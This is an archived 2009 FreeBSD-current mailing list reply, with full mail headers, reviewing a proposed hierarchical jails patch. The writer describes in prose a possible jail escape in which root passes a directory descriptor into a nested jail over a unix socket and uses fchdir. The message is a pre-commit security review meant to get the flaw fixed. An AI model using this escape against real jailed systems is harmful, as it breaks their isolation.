From owner-freebsd-current@FreeBSD.ORG Thu May 14 18:15:03 2009 Return-Path: Delivered-To: freebsd-current@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 1402C106566C; Thu, 14 May 2009 18:15:03 +0000 (UTC) (envelope-from jilles@stack.nl) Received: from mx1.stack.nl (relay02.stack.nl [IPv6:2001:610:1108:5010::104]) by mx1.freebsd.org (Postfix) with ESMTP id C39F78FC23; Thu, 14 May 2009 18:15:02 +0000 (UTC) (envelope-from jilles@stack.nl) Received: by mx1.stack.nl (Postfix, from userid 65534) id 81A7D359966; Thu, 14 May 2009 20:15:01 +0200 (CEST) X-Spam-DCC: wuwien: scanner01.stack.nl 1290; Body=1 Fuz1=1 Fuz2=1 X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on scanner01.stack.nl X-Spam-Level: X-Spam-Status: No, score=-2.9 required=5.0 tests=AWL,BAYES_00,NO_RELAYS autolearn=ham version=3.2.5 X-Spam-Relay-Country: _RELAYCOUNTRY_ Received: from snail.stack.nl (snail.stack.nl [IPv6:2001:610:1108:5010::131]) by mx1.stack.nl (Postfix) with ESMTP id 7287C359957; Thu, 14 May 2009 20:14:59 +0200 (CEST) Received: by snail.stack.nl (Postfix, from userid 1677) id BCD41228A9; Thu, 14 May 2009 20:14:46 +0200 (CEST) Date: Thu, 14 May 2009 20:14:46 +0200 From: Jilles Tjoelker To: Jamie Gritton Message-ID: <20090514181446.GA42264@stack.nl> References: <4A051DE3.30705@FreeBSD.org> <4A0C5112.9010103@FreeBSD.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4A0C5112.9010103@FreeBSD.org> User-Agent: Mutt/1.5.18 (2008-05-17) Cc: virtualization@FreeBSD.org, jail@FreeBSD.org, FreeBSD Current Subject: Re: Hierarchical jails X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 14 May 2009 18:15:03 -0000 On Thu, May 14, 2009 at 11:12:50AM -0600, Jamie Gritton wrote: > There's still a change to offer your input on the new jails before they > go in! OK, given the lack of response so far, it's less "still a > chance" than "please?". Current plans are to have this in place for > 8.0, with connections to the ongoing Vimage work. Hopefully the silence > is approval, and commits will likely be appearing soon. I have not tried this, but I think this patch may allow jailed roots to escape. The problem is that there is only one fd_jdir. The escape would go like: jailed root creates a new jail in a subdirectory, opens its / and sends the fd to a process in the new jail via a unix domain socket. When the process calls fchdir on the fd, it will be able to access .. normally. With nested chroot, or chroot in jail, this is not possible, because fd_jdir always contains the first jail or chroot done and will not allow escaping from it; however, root in a level 2 chroot can escape back to level 1 using chroot. -- Jilles Tjoelker